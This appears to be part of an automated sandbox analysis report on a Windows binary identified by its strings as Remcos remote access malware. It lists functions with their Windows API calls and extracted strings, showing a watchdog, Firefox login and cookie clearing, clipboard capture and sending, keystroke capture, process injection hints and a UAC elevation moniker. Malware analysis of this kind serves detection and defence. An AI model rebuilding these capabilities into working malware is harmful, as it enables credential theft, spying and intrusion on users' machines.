                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 89468d9d819689ce71a14d6c2ab0f362868c66ae6ec47320c110a82a7cdc7e5c
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 89468d9d819689ce71a14d6c2ab0f362868c66ae6ec47320c110a82a7cdc7e5c
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004120F7 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Pj$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-1185936727
                                • Opcode ID: a6f06d6d975461e53999e87d355abb972fdf6fcb2e3af8b957eb56666153e528
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: a6f06d6d975461e53999e87d355abb972fdf6fcb2e3af8b957eb56666153e528
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: f67c7b742204fdc5d77f255c0325554f1dfd1f76d2e9b6ee77996e0de3cbfab6
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: f67c7b742204fdc5d77f255c0325554f1dfd1f76d2e9b6ee77996e0de3cbfab6
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004168C1 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@$hdF
                                • API String ID: 3520204547-3475379602
                                • Opcode ID: 58fed128c3f86ab17b0bd22f60481775d3bd2f1df992e5f45e4f6afff7fde0a0
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 58fed128c3f86ab17b0bd22f60481775d3bd2f1df992e5f45e4f6afff7fde0a0
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F474 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 210processCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$Pj$hdF$hdF$ieinstal.exe$ielowutil.exe
                                • API String ID: 3756808967-3523306958
                                • Opcode ID: 5a2294e59db7c27b7807dc3d136ce10c94905aa7ef5ac5238dac54e749f80625
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 5a2294e59db7c27b7807dc3d136ce10c94905aa7ef5ac5238dac54e749f80625
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 5cc50f8fd21b53155f4fa546f2c7f68f14a55f9ccce602792c20db31142d2112
                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                • Opcode Fuzzy Hash: 5cc50f8fd21b53155f4fa546f2c7f68f14a55f9ccce602792c20db31142d2112
                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C291 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID: Pj
                                • API String ID: 2341273852-4015572141
                                • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: e314ccd8c52d6eea2e4540d377f75477af79112b351f4132febb0a489c34d42f
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: e314ccd8c52d6eea2e4540d377f75477af79112b351f4132febb0a489c34d42f
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419AF5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: (eF$8SG$PXG$PXG$NG$PG
                                • API String ID: 341183262-875132146
                                • Opcode ID: a249e7fb000a4d3a6754af60f986f53d15ee355c44bdbf7b4608c8c4e81cf226
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: a249e7fb000a4d3a6754af60f986f53d15ee355c44bdbf7b4608c8c4e81cf226
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 778d0e55463469e3bd3f63c6ac431236a83d77e410adc205391174306d863ebc
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: 778d0e55463469e3bd3f63c6ac431236a83d77e410adc205391174306d863ebc
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • GetKeyState.USER32(00000010), ref: 0040A433
                                • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

